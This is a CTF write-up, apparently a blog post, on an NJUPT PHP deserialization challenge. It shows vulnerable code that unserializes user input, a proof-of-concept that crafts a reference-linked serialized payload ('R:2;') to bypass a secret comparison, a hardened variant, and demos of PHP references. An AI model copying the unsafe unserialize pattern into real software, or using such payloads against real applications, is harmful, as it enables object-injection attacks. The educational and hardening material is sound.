NJUPT PHP Deserialization

The challenge is as follows:

```php
<?php
class just4fun {
    var $enter;
    var $secret;
}

if (isset($_GET['pass'])) {
    $pass = $_GET['pass'];

    // magic quotes were removed in PHP 7; the guard only matters on old PHP
    if(get_magic_quotes_gpc()){
        $pass=stripslashes($pass);
    }

    // attacker-controlled string is deserialized straight into an object
    $o = unserialize($pass);

    if ($o) {
        $o->secret = "*";
        if ($o->secret === $o->enter)
            echo "Congratulation! Here is my secret: ".$o->secret;
        else 
            echo "Oh no... You can't fool me";
    }
    else echo "are you trolling?";
}
?>
```

The core of it is PHP object deep versus shallow copying; see this article: https://www.cnblogs.com/nul1/p/9418080.html

Construct the POC directly:

```php
<?php 
class just4fun
{
    var $enter;
    var $secret;
    
    function __construct()
    {
        $this->enter=&$this->secret; // enter becomes an alias of secret
    }
}
echo serialize(new just4fun());

 ?>
```

The `&` reference on line 9 (`$this->enter=&$this->secret;`) is essential; without it the payload does not work.
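The following is an added example, not part of the original write-up. It embeds the serialized string that the POC above prints, round-trips it through the challenge's own logic so the effect of the `&` is visible, and then contrasts that with a check that does not trust the deserialized object graph. The class and property names come from the challenge; the function names, the `*`-comparison in the hardened variant and the sample payloads are constructed here for illustration.

```php
<?php
// Added example, not from the original write-up. Class and property names
// come from the challenge; everything else is constructed for illustration.
class just4fun {
    var $enter;
    var $secret;
}

// Output of the POC: "R:2;" makes `secret` a reference to slot 2 of the
// serialization graph, which is `enter` (slot 1 is the object itself).
$withRef = 'O:8:"just4fun":2:{s:5:"enter";N;s:6:"secret";R:2;}';
// Same shape without the reference: two independent null properties.
$withoutRef = 'O:8:"just4fun":2:{s:5:"enter";N;s:6:"secret";N;}';

// Mirrors the challenge's logic (hypothetical function name).
function challengeCheck(string $payload): bool {
    $o = unserialize($payload);
    if (!$o) {
        return false;
    }
    $o->secret = "*";                 // the server overwrites secret ...
    return $o->secret === $o->enter;  // ... and a reference drags enter along
}

// Hardened variant (constructed here): deserialize without instantiating any
// class, accept only a plain array, and compare against a server-side value
// instead of a property the payload may have aliased.
function hardenedCheck(string $payload): bool {
    $data = @unserialize($payload, ['allowed_classes' => false]);
    if (!is_array($data) || !isset($data['enter']) || !is_string($data['enter'])) {
        // an "O:" payload becomes __PHP_Incomplete_Class and fails is_array
        return false;
    }
    // constant-time comparison against the value the server holds
    return hash_equals("*", $data['enter']);
}

var_dump(challengeCheck($withRef));
var_dump(challengeCheck($withoutRef));
var_dump(hardenedCheck($withRef));
var_dump(hardenedCheck('a:1:{s:5:"enter";s:1:"*";}'));
```

`challengeCheck` returns true for the payload with `R:2;` and false for the one without it: the server's own write to `secret` is what lands in `enter`. `hardenedCheck` rejects both object payloads, because with `allowed_classes => false` they deserialize to `__PHP_Incomplete_Class` rather than an array, and accepts only the plain array form.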

What `&` means:

`&` creates a reference, which is the shallow-copy case: when one side changes, the other changes with it.

```php
<?php 
$a = "xxoo";
$b = &$a;       // $b is now an alias of $a
$b = 'aaaaaa';  // writes through the alias
echo $a;        // prints "aaaaaa"
 ?>
```
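As an added example that is not part of the original post, the block below extends the snippet above to show how `&` aliasing behaves under plain assignment, `unset()`, and `clone`, the last being where the deep-versus-shallow-copy question the post refers to actually bites. The class `Holder`, the function names and the variable names are made up here.

```php
<?php
// Added example, not from the original post. Class, function and variable
// names are constructed for illustration.
class Holder {
    public $enter;
    public $secret;
}

function referenceDemo(): array {
    $a = "xxoo";
    $b = &$a;        // $b is an alias of $a (same variable slot)
    $c = $a;         // $c is an independent copy
    $b = "aaaaaa";   // writes through the alias, so $a changes too; $c does not
    $afterWrite = [$a, $b, $c];

    unset($b);       // removes the alias; the value in $a survives
    $b = "other";    // a plain variable again, $a is untouched
    $afterUnset = [$a, $b];

    return ['after_write' => $afterWrite, 'after_unset' => $afterUnset];
}

function cloneDemo(): array {
    // clone performs a shallow copy: a property that is a reference stays a
    // reference shared by the original and the clone.
    $h = new Holder();
    $h->enter = &$h->secret;
    $copy = clone $h;
    $copy->secret = "*";    // written through the shared reference
    $shared = [$h->secret, $h->enter, $copy->enter];

    // Assigning by value instead of by reference leaves the properties
    // independent, so overwriting secret afterwards does not touch enter.
    $v = new Holder();
    $v->secret = "x";
    $v->enter = $v->secret;
    $v->secret = "*";
    $independent = [$v->secret, $v->enter];

    return ['shared' => $shared, 'independent' => $independent];
}

print_r(referenceDemo());
print_r(cloneDemo());
```

`referenceDemo` yields `["aaaaaa", "aaaaaa", "xxoo"]` after the write and `["aaaaaa", "other"]` after the `unset()`. In `cloneDemo`, all three entries of `shared` read `"*"` even though only the clone was written to, while `independent` is `["*", "x"]`. That shared-reference behaviour across `clone` is exactly why the POC's `&` survives serialization and lets the server's own assignment satisfy the comparison.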
Original post: https://www.cnblogs.com/nul1/p/9417484.html